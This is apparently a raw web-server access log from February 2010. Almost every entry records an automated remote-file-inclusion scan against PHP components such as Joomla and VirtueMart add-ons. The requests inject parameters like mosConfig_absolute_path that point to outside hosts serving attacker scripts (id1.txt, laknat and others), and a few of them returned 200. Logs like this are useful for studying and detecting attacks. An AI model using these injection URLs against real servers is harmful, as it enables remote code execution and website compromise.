219.240.36.36 - - [21/Feb/2010:09:04:52 -0800] "GET /logs///ams/amboard/index.php?_SERVER[DOCUMENT_ROOT]=http://www.photomagic.co.kr/main/data/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
222.237.78.176 - - [21/Feb/2010:09:04:53 -0800] "GET //ams/amboard/index.php?_SERVER[DOCUMENT_ROOT]=http://etc.fiz.su/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
222.237.78.176 - - [21/Feb/2010:09:04:54 -0800] "GET /logs///ams/amboard/index.php?_SERVER[DOCUMENT_ROOT]=http://etc.fiz.su/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
222.237.78.176 - - [21/Feb/2010:09:04:54 -0800] "GET /logs/access_100201.log%20%20///ams/amboard/index.php?_SERVER[DOCUMENT_ROOT]=http://etc.fiz.su/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
222.237.78.176 - - [21/Feb/2010:09:05:16 -0800] "GET //ams/amboard/index.php?_SERVER[DOCUMENT_ROOT]=http://etc.fiz.su/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
222.237.78.176 - - [21/Feb/2010:09:05:27 -0800] "GET /logs///ams/amboard/index.php?_SERVER[DOCUMENT_ROOT]=http://etc.fiz.su/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
222.237.78.176 - - [21/Feb/2010:09:05:27 -0800] "GET /logs/access_100114.log///ams/amboard/index.php?_SERVER[DOCUMENT_ROOT]=http://etc.fiz.su/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
222.237.78.176 - - [21/Feb/2010:09:05:39 -0800] "GET /logs/access_100114.log%20%20///ams/amboard/index.php?_SERVER[DOCUMENT_ROOT]=http://etc.fiz.su/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.144 - - [21/Feb/2010:09:06:12 -0800] "GET /logs/COMPONENTS/COM_KOESUBMIT/KOESUBMIT.PHP?MOSCONFIG_ABSOLUTE_PATH=http://www.import-et-export.fr//components/com_virtuemart/rs1?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.144 - - [21/Feb/2010:09:06:12 -0800] "GET /logs/access_100124.log%20%20/COMPONENTS/COM_KOESUBMIT/KOESUBMIT.PHP?MOSCONFIG_ABSOLUTE_PATH=http://www.import-et-export.fr//components/com_virtuemart/rs1?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.144 - - [21/Feb/2010:09:06:12 -0800] "GET /COMPONENTS/COM_KOESUBMIT/KOESUBMIT.PHP?MOSCONFIG_ABSOLUTE_PATH=http://www.import-et-export.fr//components/com_virtuemart/rs1?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.144 - - [21/Feb/2010:09:06:20 -0800] "GET /logs/access_100119.log%20%20/COMPONENTS/COM_KOESUBMIT/KOESUBMIT.PHP?MOSCONFIG_ABSOLUTE_PATH=http://www.import-et-export.fr//components/com_virtuemart/rs1?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
67.15.24.16 - - [21/Feb/2010:09:07:38 -0800] "GET /components/com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute.path=http://phppod.com//administrator/components/aadc/id1.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
67.15.24.16 - - [21/Feb/2010:09:07:38 -0800] "GET /logs//components/com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute.path=http://phppod.com//administrator/components/aadc/id1.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
67.15.24.16 - - [21/Feb/2010:09:07:38 -0800] "GET /logs/access_100127.log//components/com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute.path=http://phppod.com//administrator/components/aadc/id1.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
74.86.155.18 - - [21/Feb/2010:09:07:43 -0800] "GET /logs/access_100205.log/admin/spaw/spaw_control.class.php?spaw_root=http://www.beautycnc.com/bbs/bbs/idxx.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
67.15.24.16 - - [21/Feb/2010:09:07:52 -0800] "GET /logs/access_100123.log//components/com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute.path=http://phppod.com//administrator/components/aadc/id1.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.144 - - [21/Feb/2010:09:08:48 -0800] "GET /logs/access_100124.log/COMPONENTS/COM_KOESUBMIT/KOESUBMIT.PHP?MOSCONFIG_ABSOLUTE_PATH=http://www.import-et-export.fr//components/com_virtuemart/rs1?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.144 - - [21/Feb/2010:09:08:48 -0800] "GET /COMPONENTS/COM_KOESUBMIT/KOESUBMIT.PHP?MOSCONFIG_ABSOLUTE_PATH=http://www.import-et-export.fr//components/com_virtuemart/rs1?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.144 - - [21/Feb/2010:09:09:07 -0800] "GET /logs/access_100119.log/COMPONENTS/COM_KOESUBMIT/KOESUBMIT.PHP?MOSCONFIG_ABSOLUTE_PATH=http://www.import-et-export.fr//components/com_virtuemart/rs1?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
75.119.216.146 - - [21/Feb/2010:09:10:12 -0800] "GET /logs/access_100114.log//index.php/component/option,com_performs/formid,1/Itemid,41//index.php/index.php?mosConfig_absolute_path=http://www.provedorm4net.com.br/portal/.laknat/laknat???? HTTP/1.1" 404 5258 "-" "libwww-perl/5.805" "www.puaga.com"
75.119.216.146 - - [21/Feb/2010:09:10:12 -0800] "GET /logs//index.php/component/option,com_performs/formid,1/Itemid,41//index.php/index.php?mosConfig_absolute_path=http://www.provedorm4net.com.br/portal/.laknat/laknat???? HTTP/1.1" 404 5258 "-" "libwww-perl/5.805" "www.puaga.com"
75.119.216.146 - - [21/Feb/2010:09:10:12 -0800] "GET /index.php/component/option,com_performs/formid,1/Itemid,41//index.php/index.php?mosConfig_absolute_path=http://www.provedorm4net.com.br/portal/.laknat/laknat???? HTTP/1.1" 200 3642 "-" "libwww-perl/5.805" "www.puaga.com"
216.104.46.66 - - [21/Feb/2010:09:10:44 -0800] "GET /logs/access_100116.log//vwar/convert/mvcw.php?step=1&vwar_root=http://www.ultratone.com.my/new/idxx.pdf??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
216.104.46.66 - - [21/Feb/2010:09:10:44 -0800] "GET /logs//vwar/convert/mvcw.php?step=1&vwar_root=http://www.ultratone.com.my/new/idxx.pdf??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
216.104.46.66 - - [21/Feb/2010:09:10:44 -0800] "GET /vwar/convert/mvcw.php?step=1&vwar_root=http://www.ultratone.com.my/new/idxx.pdf??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
216.104.46.66 - - [21/Feb/2010:09:10:51 -0800] "GET /logs//vwar/convert/mvcw.php?step=1&vwar_root=http://www.ultratone.com.my/new/idxx.pdf??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
216.104.46.66 - - [21/Feb/2010:09:10:51 -0800] "GET /vwar/convert/mvcw.php?step=1&vwar_root=http://www.ultratone.com.my/new/idxx.pdf??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
216.104.46.66 - - [21/Feb/2010:09:10:51 -0800] "GET /logs/access_100116.log//vwar/convert/mvcw.php?step=1&vwar_root=http://www.ultratone.com.my/new/idxx.pdf??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
210.116.103.96 - - [21/Feb/2010:09:12:31 -0800] "GET /components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://etc.fiz.su/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
210.116.103.96 - - [21/Feb/2010:09:12:31 -0800] "GET /logs/access_100122.log//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://etc.fiz.su/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
210.116.103.96 - - [21/Feb/2010:09:12:32 -0800] "GET /logs//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://etc.fiz.su/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
194.242.113.160 - - [21/Feb/2010:09:13:24 -0800] "GET /skin/zero_vote/ask_password.php?dir=http://www.esquilu.com/portal//modules/PNphpBB2/includes/fx29id2.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
194.242.113.160 - - [21/Feb/2010:09:13:24 -0800] "GET /logs//skin/zero_vote/ask_password.php?dir=http://www.esquilu.com/portal//modules/PNphpBB2/includes/fx29id2.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
194.242.113.160 - - [21/Feb/2010:09:13:24 -0800] "GET /logs/access_100201.log%20%20//skin/zero_vote/ask_password.php?dir=http://www.esquilu.com/portal//modules/PNphpBB2/includes/fx29id2.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
74.52.8.138 - - [21/Feb/2010:09:13:29 -0800] "GET /logs/access_100115.log%20//cart_content.php?cart_isp_root=http://www.b3infotech.com/readme.txt??? HTTP/1.1" 404 5258 "-" "libwww-perl/5.834" "www.puaga.com"
74.52.8.138 - - [21/Feb/2010:09:13:31 -0800] "GET /cart_content.php?cart_isp_root=http://www.b3infotech.com/readme.txt??? HTTP/1.1" 404 5258 "-" "libwww-perl/5.834" "www.puaga.com"
74.52.8.138 - - [21/Feb/2010:09:13:31 -0800] "GET /logs//cart_content.php?cart_isp_root=http://www.b3infotech.com/readme.txt??? HTTP/1.1" 404 5258 "-" "libwww-perl/5.834" "www.puaga.com"
78.110.50.120 - - [21/Feb/2010:09:14:36 -0800] "GET /logs/access_100114.log//index.php/component/option,com_performs/formid,1/Itemid,41//index.php/index.php?mosConfig_absolute_path=http://www.provedorm4net.com.br/portal/.laknat/laknat???? HTTP/1.1" 404 5258 "-" "libwww-perl/5.831" "www.puaga.com"
78.110.50.120 - - [21/Feb/2010:09:14:37 -0800] "GET /logs//index.php/component/option,com_performs/formid,1/Itemid,41//index.php/index.php?mosConfig_absolute_path=http://www.provedorm4net.com.br/portal/.laknat/laknat???? HTTP/1.1" 404 5258 "-" "libwww-perl/5.831" "www.puaga.com"
78.110.50.120 - - [21/Feb/2010:09:14:37 -0800] "GET /index.php/component/option,com_performs/formid,1/Itemid,41//index.php/index.php?mosConfig_absolute_path=http://www.provedorm4net.com.br/portal/.laknat/laknat???? HTTP/1.1" 200 3642 "-" "libwww-perl/5.831" "www.puaga.com"
75.119.216.146 - - [21/Feb/2010:09:16:02 -0800] "GET /logs/access_100202.log//index.php/index.php?mosConfig_absolute_path=http://www.provedorm4net.com.br/portal/.laknat/laknat???? HTTP/1.1" 404 5258 "-" "libwww-perl/5.805" "www.puaga.com"
75.119.216.146 - - [21/Feb/2010:09:16:02 -0800] "GET /logs//index.php/index.php?mosConfig_absolute_path=http://www.provedorm4net.com.br/portal/.laknat/laknat???? HTTP/1.1" 404 5258 "-" "libwww-perl/5.805" "www.puaga.com"
75.119.216.146 - - [21/Feb/2010:09:16:02 -0800] "GET /index.php/index.php?mosConfig_absolute_path=http://www.provedorm4net.com.br/portal/.laknat/laknat???? HTTP/1.1" 200 3642 "-" "libwww-perl/5.805" "www.puaga.com"
219.94.194.248 - - [21/Feb/2010:09:16:04 -0800] "GET /logs//administrator/com_lurm_constructor/admin.lurm_constructor.php?lm_absolute_path=http://www.kyungilcorp.com/board/data/trashi_/sc1?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
219.94.194.248 - - [21/Feb/2010:09:16:04 -0800] "GET /administrator/com_lurm_constructor/admin.lurm_constructor.php?lm_absolute_path=http://www.kyungilcorp.com/board/data/trashi_/sc1?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
219.94.194.248 - - [21/Feb/2010:09:16:09 -0800] "GET /logs/access_100205.log%20%20//administrator/com_lurm_constructor/admin.lurm_constructor.php?lm_absolute_path=http://www.kyungilcorp.com/board/data/trashi_/sc1?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
75.119.216.146 - - [21/Feb/2010:09:16:35 -0800] "GET /logs/access_100121.log//index.php/index.php?mosConfig_absolute_path=http://www.provedorm4net.com.br/portal/.laknat/laknat???? HTTP/1.1" 404 5258 "-" "libwww-perl/5.805" "www.puaga.com"
83.103.72.130 - - [21/Feb/2010:09:16:50 -0800] "GET /logs//administrator/com_lurm_constructor/admin.lurm_constructor.php?lm_absolute_path=http://www.airbrush.cl/airbrush/m2/content/geshi/.../icon/fxd?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
83.103.72.130 - - [21/Feb/2010:09:16:50 -0800] "GET /administrator/com_lurm_constructor/admin.lurm_constructor.php?lm_absolute_path=http://www.airbrush.cl/airbrush/m2/content/geshi/.../icon/fxd?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
83.103.72.130 - - [21/Feb/2010:09:16:50 -0800] "GET /logs/access_100205.log%20%20//administrator/com_lurm_constructor/admin.lurm_constructor.php?lm_absolute_path=http://www.airbrush.cl/airbrush/m2/content/geshi/.../icon/fxd?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
83.103.72.130 - - [21/Feb/2010:09:16:55 -0800] "GET /logs/access_100208.log%20%20//administrator/com_lurm_constructor/admin.lurm_constructor.php?lm_absolute_path=http://www.airbrush.cl/airbrush/m2/content/geshi/.../icon/fxd?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
78.110.50.120 - - [21/Feb/2010:09:17:23 -0800] "GET /logs/access_100202.log//index.php/index.php?mosConfig_absolute_path=http://www.provedorm4net.com.br/portal/.laknat/laknat???? HTTP/1.1" 404 5258 "-" "libwww-perl/5.831" "www.puaga.com"
78.110.50.120 - - [21/Feb/2010:09:17:23 -0800] "GET /logs//index.php/index.php?mosConfig_absolute_path=http://www.provedorm4net.com.br/portal/.laknat/laknat???? HTTP/1.1" 404 5258 "-" "libwww-perl/5.831" "www.puaga.com"
78.110.50.120 - - [21/Feb/2010:09:17:24 -0800] "GET /index.php/index.php?mosConfig_absolute_path=http://www.provedorm4net.com.br/portal/.laknat/laknat???? HTTP/1.1" 200 3642 "-" "libwww-perl/5.831" "www.puaga.com"
219.94.194.248 - - [21/Feb/2010:09:17:29 -0800] "GET /logs/access_100208.log%20%20//administrator/com_lurm_constructor/admin.lurm_constructor.php?lm_absolute_path=http://www.kyungilcorp.com/board/data/trashi_/sc1?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
78.110.50.120 - - [21/Feb/2010:09:17:47 -0800] "GET /logs/access_100121.log//index.php/index.php?mosConfig_absolute_path=http://www.provedorm4net.com.br/portal/.laknat/laknat???? HTTP/1.1" 404 5258 "-" "libwww-perl/5.831" "www.puaga.com"
78.110.50.102 - - [21/Feb/2010:09:18:35 -0800] "GET /logs//bbs/delete_comment.php?board_skin_path=http://www.ville-surylecomtal.fr/new/administrator/includes/iid1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
78.110.50.102 - - [21/Feb/2010:09:18:35 -0800] "GET /logs/access_100206.log%20%20//bbs/delete_comment.php?board_skin_path=http://www.ville-surylecomtal.fr/new/administrator/includes/iid1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
78.110.50.102 - - [21/Feb/2010:09:18:36 -0800] "GET /bbs/delete_comment.php?board_skin_path=http://www.ville-surylecomtal.fr/new/administrator/includes/iid1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
222.237.78.176 - - [21/Feb/2010:09:19:24 -0800] "GET /logs/access_100114.log%20%20///ams/amboard/index.php?_SERVER[DOCUMENT_ROOT]=http://etc.fiz.su/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
222.237.78.176 - - [21/Feb/2010:09:19:30 -0800] "GET /logs/access_100201.log%20%20///ams/amboard/index.php?_SERVER[DOCUMENT_ROOT]=http://etc.fiz.su/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
87.106.183.19 - - [21/Feb/2010:09:19:50 -0800] "GET /skin/ggambo4100_gallery2/setup.php?setup[use_category]=http://snia2009.com/components/com_jce/zfxid1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
87.106.183.19 - - [21/Feb/2010:09:19:50 -0800] "GET /logs/access_100122.log//skin/ggambo4100_gallery2/setup.php?setup[use_category]=http://snia2009.com/components/com_jce/zfxid1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
87.106.183.19 - - [21/Feb/2010:09:19:50 -0800] "GET /logs//skin/ggambo4100_gallery2/setup.php?setup[use_category]=http://snia2009.com/components/com_jce/zfxid1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
62.140.23.24 - - [21/Feb/2010:09:19:59 -0800] "GET /logs/access_100124.log%20%20/COMPONENTS/COM_KOESUBMIT/KOESUBMIT.PHP?MOSCONFIG_ABSOLUTE_PATH=http://www.kpa.sc.kr////upload_data/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
62.140.23.24 - - [21/Feb/2010:09:19:59 -0800] "GET /logs/COMPONENTS/COM_KOESUBMIT/KOESUBMIT.PHP?MOSCONFIG_ABSOLUTE_PATH=http://www.kpa.sc.kr////upload_data/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
62.140.23.24 - - [21/Feb/2010:09:20:00 -0800] "GET /logs/COMPONENTS/COM_KOESUBMIT/KOESUBMIT.PHP?MOSCONFIG_ABSOLUTE_PATH=http://www.kpa.sc.kr////upload_data/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
62.140.23.24 - - [21/Feb/2010:09:20:00 -0800] "GET /logs/access_100124.log%20%20/COMPONENTS/COM_KOESUBMIT/KOESUBMIT.PHP?MOSCONFIG_ABSOLUTE_PATH=http://www.kpa.sc.kr////upload_data/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
62.140.23.24 - - [21/Feb/2010:09:20:00 -0800] "GET /COMPONENTS/COM_KOESUBMIT/KOESUBMIT.PHP?MOSCONFIG_ABSOLUTE_PATH=http://www.kpa.sc.kr////upload_data/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
62.140.23.24 - - [21/Feb/2010:09:20:00 -0800] "GET /COMPONENTS/COM_KOESUBMIT/KOESUBMIT.PHP?MOSCONFIG_ABSOLUTE_PATH=http://www.kpa.sc.kr////upload_data/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
87.106.183.19 - - [21/Feb/2010:09:20:03 -0800] "GET /logs/access_100126.log//skin/ggambo4100_gallery2/setup.php?setup[use_category]=http://snia2009.com/components/com_jce/zfxid1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.144 - - [21/Feb/2010:09:20:07 -0800] "GET /COMPONENTS/COM_KOESUBMIT/KOESUBMIT.PHP?MOSCONFIG_ABSOLUTE_PATH=http://www.modernart2day.se//administrator/cache/satu?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.144 - - [21/Feb/2010:09:20:07 -0800] "GET /logs/COMPONENTS/COM_KOESUBMIT/KOESUBMIT.PHP?MOSCONFIG_ABSOLUTE_PATH=http://www.modernart2day.se//administrator/cache/satu?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.144 - - [21/Feb/2010:09:20:08 -0800] "GET /logs/access_100124.log%20%20/COMPONENTS/COM_KOESUBMIT/KOESUBMIT.PHP?MOSCONFIG_ABSOLUTE_PATH=http://www.modernart2day.se//administrator/cache/satu?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
62.140.23.24 - - [21/Feb/2010:09:20:13 -0800] "GET /logs/access_100119.log%20%20/COMPONENTS/COM_KOESUBMIT/KOESUBMIT.PHP?MOSCONFIG_ABSOLUTE_PATH=http://www.kpa.sc.kr////upload_data/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
62.140.23.24 - - [21/Feb/2010:09:20:14 -0800] "GET /logs/access_100119.log%20%20/COMPONENTS/COM_KOESUBMIT/KOESUBMIT.PHP?MOSCONFIG_ABSOLUTE_PATH=http://www.kpa.sc.kr////upload_data/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
222.237.78.176 - - [21/Feb/2010:09:20:29 -0800] "GET /logs/access_100114.log///ams/amboard/index.php?_SERVER[DOCUMENT_ROOT]=http://etc.fiz.su/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
66.230.221.15 - - [21/Feb/2010:09:20:37 -0800] "GET /s_loadenv.inc.php?DOCUMENT_ROOT=http://car.sorabol.ac.kr///xe/files/.files/id1?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
66.230.221.15 - - [21/Feb/2010:09:20:37 -0800] "GET /logs/access_100203.log%20%20//s_loadenv.inc.php?DOCUMENT_ROOT=http://car.sorabol.ac.kr///xe/files/.files/id1?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
66.230.221.15 - - [21/Feb/2010:09:20:37 -0800] "GET /logs//s_loadenv.inc.php?DOCUMENT_ROOT=http://car.sorabol.ac.kr///xe/files/.files/id1?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.144 - - [21/Feb/2010:09:20:41 -0800] "GET /logs/access_100119.log%20%20/COMPONENTS/COM_KOESUBMIT/KOESUBMIT.PHP?MOSCONFIG_ABSOLUTE_PATH=http://www.modernart2day.se//administrator/cache/satu?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
222.237.78.176 - - [21/Feb/2010:09:20:44 -0800] "GET /logs/access_100201.log///ams/amboard/index.php?_SERVER[DOCUMENT_ROOT]=http://etc.fiz.su/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
74.86.155.18 - - [21/Feb/2010:09:20:53 -0800] "GET /s_loadenv.inc.php?DOCUMENT_ROOT=http://car.sorabol.ac.kr///xe/files/.files/id1??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
74.86.155.18 - - [21/Feb/2010:09:20:53 -0800] "GET /logs//s_loadenv.inc.php?DOCUMENT_ROOT=http://car.sorabol.ac.kr///xe/files/.files/id1??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
74.86.155.18 - - [21/Feb/2010:09:20:53 -0800] "GET /logs/access_100203.log%20%20//s_loadenv.inc.php?DOCUMENT_ROOT=http://car.sorabol.ac.kr///xe/files/.files/id1??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
66.230.221.15 - - [21/Feb/2010:09:21:02 -0800] "GET /logs/access_100206.log%20%20//s_loadenv.inc.php?DOCUMENT_ROOT=http://car.sorabol.ac.kr///xe/files/.files/id1?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
74.86.155.18 - - [21/Feb/2010:09:21:17 -0800] "GET /logs/access_100206.log%20%20//s_loadenv.inc.php?DOCUMENT_ROOT=http://car.sorabol.ac.kr///xe/files/.files/id1??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
82.179.244.69 - - [21/Feb/2010:09:21:36 -0800] "GET /logs//skin/zero_vote/ask_password.php?dir=http://juryeclub.com/images/fx29id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
82.179.244.69 - - [21/Feb/2010:09:21:36 -0800] "GET /logs/access_100201.log//skin/zero_vote/ask_password.php?dir=http://juryeclub.com/images/fx29id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
82.179.244.69 - - [21/Feb/2010:09:21:36 -0800] "GET /skin/zero_vote/ask_password.php?dir=http://juryeclub.com/images/fx29id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
87.106.183.19 - - [21/Feb/2010:09:22:14 -0800] "GET /skin/ggambo4100_gallery2/setup.php?setup[use_category]=http://snia2009.com/components/com_jce/zfxid1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
87.106.183.19 - - [21/Feb/2010:09:22:14 -0800] "GET /logs/access_100122.log//skin/ggambo4100_gallery2/setup.php?setup[use_category]=http://snia2009.com/components/com_jce/zfxid1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
87.106.183.19 - - [21/Feb/2010:09:22:14 -0800] "GET /logs//skin/ggambo4100_gallery2/setup.php?setup[use_category]=http://snia2009.com/components/com_jce/zfxid1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
209.126.254.112 - - [21/Feb/2010:09:22:16 -0800] "GET /COMPONENTS/COM_KOESUBMIT/KOESUBMIT.PHP?MOSCONFIG_ABSOLUTE_PATH=http://test.bigshop.cz/uploaded/injek.txt?? HTTP/1.1" 404 5258 "-" "libwww-perl/5.76" "www.puaga.com"
87.106.183.19 - - [21/Feb/2010:09:22:24 -0800] "GET /logs/access_100126.log//skin/ggambo4100_gallery2/setup.php?setup[use_category]=http://snia2009.com/components/com_jce/zfxid1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.144 - - [21/Feb/2010:09:23:29 -0800] "GET /COMPONENTS/COM_KOESUBMIT/KOESUBMIT.PHP?MOSCONFIG_ABSOLUTE_PATH=http://www.modernart2day.se//administrator/cache/satu?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.144 - - [21/Feb/2010:09:23:32 -0800] "GET /logs/access_100124.log/COMPONENTS/COM_KOESUBMIT/KOESUBMIT.PHP?MOSCONFIG_ABSOLUTE_PATH=http://www.modernart2day.se//administrator/cache/satu?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.144 - - [21/Feb/2010:09:23:32 -0800] "GET /logs/COMPONENTS/COM_KOESUBMIT/KOESUBMIT.PHP?MOSCONFIG_ABSOLUTE_PATH=http://www.modernart2day.se//administrator/cache/satu?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
209.126.254.112 - - [21/Feb/2010:09:23:38 -0800] "GET /COMPONENTS/COM_KOESUBMIT/KOESUBMIT.PHP?MOSCONFIG_ABSOLUTE_PATH=http://test.bigshop.cz/uploaded/injek.txt?? HTTP/1.1" 404 5258 "-" "libwww-perl/5.76" "www.puaga.com"
58.150.99.144 - - [21/Feb/2010:09:25:04 -0800] "GET /logs/access_100119.log/COMPONENTS/COM_KOESUBMIT/KOESUBMIT.PHP?MOSCONFIG_ABSOLUTE_PATH=http://www.modernart2day.se//administrator/cache/satu?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
78.110.50.102 - - [21/Feb/2010:09:26:48 -0800] "GET /logs/access_100202.log%20%20//bbs/delete_comment.php?board_skin_path=http://www.ville-surylecomtal.fr/new/administrator/includes/iid1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
74.86.155.18 - - [21/Feb/2010:09:27:11 -0800] "GET /logs/access_100203.log//s_loadenv.inc.php?DOCUMENT_ROOT=http://car.sorabol.ac.kr///xe/files/.files/id1??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
209.126.254.112 - - [21/Feb/2010:09:27:16 -0800] "GET /logs/access_100124.log/COMPONENTS/COM_KOESUBMIT/KOESUBMIT.PHP?MOSCONFIG_ABSOLUTE_PATH=http://test.bigshop.cz/uploaded/injek.txt?? HTTP/1.1" 404 5258 "-" "libwww-perl/5.76" "www.puaga.com"
209.126.254.112 - - [21/Feb/2010:09:27:16 -0800] "GET /COMPONENTS/COM_KOESUBMIT/KOESUBMIT.PHP?MOSCONFIG_ABSOLUTE_PATH=http://test.bigshop.cz/uploaded/injek.txt?? HTTP/1.1" 404 5258 "-" "libwww-perl/5.76" "www.puaga.com"
209.126.254.112 - - [21/Feb/2010:09:27:17 -0800] "GET /logs/COMPONENTS/COM_KOESUBMIT/KOESUBMIT.PHP?MOSCONFIG_ABSOLUTE_PATH=http://test.bigshop.cz/uploaded/injek.txt?? HTTP/1.1" 404 5258 "-" "libwww-perl/5.76" "www.puaga.com"
